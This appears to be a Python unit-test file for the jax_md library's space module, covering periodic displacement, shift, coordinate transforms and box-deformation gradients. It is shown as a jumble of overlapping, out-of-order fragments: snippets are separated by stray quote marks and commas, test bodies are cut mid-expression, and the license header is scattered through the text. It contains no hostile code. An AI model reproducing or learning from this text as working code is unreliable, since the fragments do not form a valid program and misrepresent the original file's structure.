@parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "'spatial_dimension': dim } for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension):", "dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "dtype, box_format): assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0,", "box_format == 'matrix': box = jnp.array(jnp.eye(dim) * box_size, dtype) d,", "disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn =", "R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list(", "def test_periodic_shift(self, spatial_dimension, dtype): key = 
random.PRNGKey(0) for _ in", "R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "R) energy_direct = lambda R: jnp.sum(R ** 2) energy_indirect =", "test_util as jtu from jax_md import space, test_util, quantity, energy", "in compliance with the License. # You may obtain a", "16 R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g)", "in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N = 16", "space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R)", "software # distributed under the License is distributed on an", "random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test =", "eye + dT + jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT,", "dtype, 'box_format': box_format } for dim in SPATIAL_DIMENSION for dtype", "dR), general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled, dR).dtype == dtype", "split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49),", "jnp.where(dR > 0.49, f32(0.49), dR) dR = jnp.where(dR < -0.49,", "(eye + dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (),", "for box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N", "= f32(10.0) box_size = max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype)", "dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 =", "R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R", "= space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key, (N,", "dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct =", "BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list(", "dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn", "# # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format):", "for j in range(-1, 2): for k in range(-1, 2):", "self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "_ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3 = random.split(key, 4)", "dtype, } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))", "deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list(", "for i in range(-1, 2): for j in range(-1, 2):", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn =", "def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0) displacement, _ =", "jnp.diag(box_size) R = random.uniform( split2, 
(PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled =", "for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if", "R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R,", "10.0 * random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal( split_T0_dT,", "= quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size) if box_format ==", "dtype=dtype) R0 = R unwrapped_R = R displacement, shift =", "with the License. # You may obtain a copy of", "import random import jax.numpy as jnp from jax import grad,", "elif box_format == 'matrix': box = jnp.array(jnp.eye(dim) * box_size, dtype)", "random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R =", "self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size)", "1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "LLC # # Licensed under the Apache License, Version 2.0", "partial from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS", "jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted", "grad(lambda R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn = grad(lambda R:", "* from functools import partial from unittest import SkipTest test_util.update_test_tolerance(5e-5,", "R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list(", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f))", "in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol", "jit, jacfwd from jax import test_util as jtu from jax_md", "box_size = max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype) transform =", "in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for", "SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT =", "partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R =", "jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype))", "SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for _ in", "s = space.periodic(jnp.diag(box) if box_format == 'matrix' else box) d_gf,", "express or implied. # See the License for the specific", "'spatial_dimension': dim, 'dtype': dtype } for dim in SPATIAL_DIMENSION for", "= jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension == 2: for", "except in compliance with the License. 
# You may obtain", "dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR", "dtype, box_format) @grad def box_energy_g_fn(box): return E_g(R, new_box=box) @grad def", "= random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size)", "space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn", "0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "dR_shifted = dR + jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted)", "dtype=dtype) T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype) disp_fn,", "box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N =", "= 0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 =", "R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "= space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list(", "* (eye + dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale,", "range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key, 3) dT = random.normal(", "CONDITIONS OF ANY KIND, either express or implied. 
# See", "box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "parameterized from jax.config import config as jax_config from jax import", "random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key,", "dim, 'dtype': dtype, 'box_format': box_format } for dim in SPATIAL_DIMENSION", "self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype)", "R: jnp.sum(R ** 2) energy_indirect = lambda T, R: jnp.sum(space.transform(T,", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self,", "j in range(-1, 2): dR_shifted = dR + jnp.array([i, j],", "if box_format == 'scalar': raise SkipTest('Scalar case fails due to", "# pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "[f32, f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim, dtype,", "(PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T,", "R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "R_shift - R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list(", "test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if", "R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime = space.transform(T, R)", "assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim) box", "E), (s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase):", "jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct,", "grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect)", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new", "test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric) for", "if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE = [f32]", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0),", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new =", "def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format == 'scalar': raise", "+ (1,)) if spatial_dimension == 2: for i in range(-1,", "= jnp.where(dR < -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R,", "f32(10.0) box_size = max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype) transform", "self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1),", "POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key = random.PRNGKey(0) eye", "jax 
import random import jax.numpy as jnp from jax import", "test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if", "License. \"\"\"Tests for jax_md.space.\"\"\" from absl.testing import absltest from absl.testing", "2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key,", "= random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR", "random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR", "energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) ** 2) grad_direct", "random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2,", "space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR)", "dR_direct = dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape", "test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension))", "= space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS):", "= grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension,", "jax_md.util import * from functools import partial from unittest import", "dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1)", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad", "random.split(key, 3) key, split_t, split_R, split_dR = random.split(key, 4) size_0", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R,", "random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list(", "range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R = random.normal(split1,", "dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R >", "'box_format': box_format } for dim in SPATIAL_DIMENSION for dtype in", "in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol", "displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS): key, split =", "for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N", "STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3]", "s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "= space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 =", "jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s, E),", "split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye +", "dtype=dtype) dR = random.normal( split_dR, 
(PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R,", "jtu from jax_md import space, test_util, quantity, energy from jax_md.util", "SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS = ['scalar',", "\"\"\"Tests for jax_md.space.\"\"\" from absl.testing import absltest from absl.testing import", "dtype } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))", "key, split_T0_scale, split_T0_dT = random.split(key, 3) key, split_T1_scale, split_T1_dT =", "spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49), dR) dR", "= random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T,", "== 'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format", "{ 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype } for", "3) key, split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t, split_R,", "E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list(", "dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype ==", "for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3)", "1.0, dim) box = dtype(box_size) if box_format == 'vector': box", "dtype=dtype) transform = jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension),", "= space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key", "random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t,", "in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format ==", "and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "jnp.array([i, j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted,", "R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR),", "make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format in BOX_FORMATS box_size =", "range(-1, 2): for j in range(-1, 2): dR_shifted = dR", "random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension))", "'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE =", "box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "1.0) assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift -", "split1, split2 = random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension))", "split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R =", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype):", "split_T0_scale, split_T0_dT = 
random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key,", "spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR)", "R) ** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T,", "= random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( {", "test_util, quantity, energy from jax_md.util import * from functools import", "dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49), dR) dR =", "R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1))", "self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "< dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct,", "= space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric) for _", "test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if", "Version 2.0 (the \"License\"); # you may not use this", "lambda T, R: jnp.sum(space.transform(T, R) ** 2) grad_direct = grad(energy_direct)(R_prime)", "dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct", "dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( {", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self,", "+ jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted,", "f32(0.49), dR) dR = jnp.where(dR < -0.49, f32(-0.49), dR) R_shift", "R0 = R unwrapped_R = R displacement, shift = space.periodic_general(T)", "2): dR_shifted = dR + jnp.array([i, j], dtype=R.dtype) dr_shifted =", "= 2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R, split_T =", "dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted", "absl.testing import absltest from absl.testing import parameterized from jax.config import", "box) d_gf, s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False)", "= 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new = s(R, grad(E)(R)) R_gf_new =", "random.uniform(key, (N, dim), dtype=dtype) R = space.transform(box, R_f) E =", "R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim }", "by applicable law or agreed to in writing, software #", "range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R = random.normal(", "JAX Issue #5849.') N = 16 R_f, R, box, (s,", "= jnp.array(size_1 * (eye + dtransform_1), dtype=dtype) disp_fn, shift_fn =", "import jax.numpy as jnp from jax import grad, jit, jacfwd", "for k in range(-1, 2): dR_shifted = dR + 
jnp.array([i,", "split = random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16", "dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R,", "box = dtype(box_size) if box_format == 'vector': box = jnp.array(jnp.ones(dim)", "j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape", "box_format): N = 16 R_f, R, box, (s, E), (s_gf,", "= box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( {", "f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype ==", "space.transform(T, R) energy_direct = lambda R: jnp.sum(R ** 2) energy_indirect", "box_format == 'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype) elif", "for dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key =", "dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted <", "1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3 =", "self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "@grad def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if __name__", "< dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted,", "space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key,", "key = random.PRNGKey(0) R_f = random.uniform(key, (N, dim), dtype=dtype) R", "(1,)) dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct", "space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return", "def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "(s_g, E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension", "key = random.PRNGKey(0) tol = 1e-13 if dtype is f32:", "applicable law or agreed to in writing, software # distributed", "dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0))", "in range(-1, 2): for k in range(-1, 2): dR_shifted =", "R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape", "space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R,", "R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f)))", "test_periodic_displacement(self, spatial_dimension, 
dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split", "dtype) elif box_format == 'matrix': box = jnp.array(jnp.eye(dim) * box_size,", "2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self,", "self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "< dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3: for i", "def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension)", "in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye", "= jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if dtype is f32:", "dtype in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_displacement(self,", "R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct =", "= dR + jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted", "unwrapped_R = R displacement, shift = space.periodic_general(T) _, unwrapped_shift =", "self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list(", "3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R),", "# You may obtain a copy of the License at", "random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T = eye + dT", "split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( {", "dtype): key = random.PRNGKey(0) displacement, _ = 